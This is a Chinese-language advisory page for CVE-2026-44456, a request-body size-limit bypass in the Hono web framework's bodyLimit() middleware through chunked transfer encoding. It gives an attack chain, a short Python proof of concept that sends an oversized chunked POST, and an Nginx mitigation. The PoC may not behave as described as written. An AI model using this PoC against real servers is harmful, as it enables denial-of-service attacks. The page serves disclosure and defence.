CVE-2026-44456 CVSS 6.5 中危

CVE-2026-44456 Hono框架请求体大小限制绕过漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44456

漏洞类型

限制绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Hono

漏洞概述

Hono Web框架在4.12.16之前的版本中存在安全限制绕过漏洞。该漏洞源于`bodyLimit()`中间件未能可靠执行`maxSize`限制，特别是针对使用`Transfer-Encoding: chunked`且缺少可用`Content-Length`头的请求。攻击者可利用此缺陷发送超大请求体，绕过服务器的大小限制检查，导致应用程序处理异常数据或引发资源耗尽风险。

技术细节

该漏洞的原理在于Hono框架的请求体大小校验逻辑存在缺陷。通常，`bodyLimit()`通过检查HTTP请求头中的`Content-Length`字段来判断请求体是否超过预设的最大值（maxSize）。然而，当攻击者发送恶意请求时，若使用分块传输编码（Transfer-Encoding: chunked）且不提供Content-Length，`bodyLimit()`的校验机制会被绕过。此时，攻击者可以发送远超限制的数据流，后端处理程序会正常接收并返回HTTP 200状态码，而不是预期的413 Payload Too Large错误。这种绕过可能导致服务器内存或CPU资源被耗尽（DoS），或破坏后端业务逻辑的完整性。

攻击链分析

STEP 1

1. 侦察

攻击者识别目标使用的是Hono框架版本小于4.12.16，并确认存在使用`bodyLimit()`的接口。

STEP 2

2. 构造恶意请求

攻击者构造HTTP POST请求，移除`Content-Length`头，添加`Transfer-Encoding: chunked`头，并包含超大的请求体数据。

STEP 3

3. 发送请求

将构造好的分块编码请求发送至目标服务器。

STEP 4

4. 绕过与利用

由于漏洞存在，`bodyLimit()`校验失效，请求体被后端处理程序接收。攻击者成功耗尽服务器资源或干扰业务逻辑。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Vulnerable endpoint)
target_url = "http://vulnerable-app/api/upload"

# Large payload exceeding the configured bodyLimit (e.g., 10MB)
# This simulates an oversized request intended to bypass the limit check
oversized_payload = b"A" * (10 * 1024 * 1024) 

# Sending the request using Transfer-Encoding: chunked
# This encoding method often bypasses Content-Length checks in vulnerable versions
try:
    response = requests.post(
        target_url,
        data=oversized_payload,
        headers={
            "Transfer-Encoding": "chunked",
            "Content-Type": "application/octet-stream"
        }
    )

    # Check if the server accepted the oversized request (Vulnerable behavior)
    if response.status_code == 200:
        print("[+] Vulnerability confirmed: Oversized request accepted (Status 200).")
    elif response.status_code == 413:
        print("[-] Request blocked: Server returned 413 (Payload Too Large).")
    else:
        print(f"[?] Unexpected response: Status {response.status_code}")

except Exception as e:
    print(f"Error occurred: {e}")

影响范围

Hono < 4.12.16

防御指南

临时缓解措施

如果无法立即升级框架，建议在Web服务器或反向代理（如Nginx）层面配置`client_max_body_size`指令，强制拦截超过特定大小的请求，防止恶意流量到达应用层。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表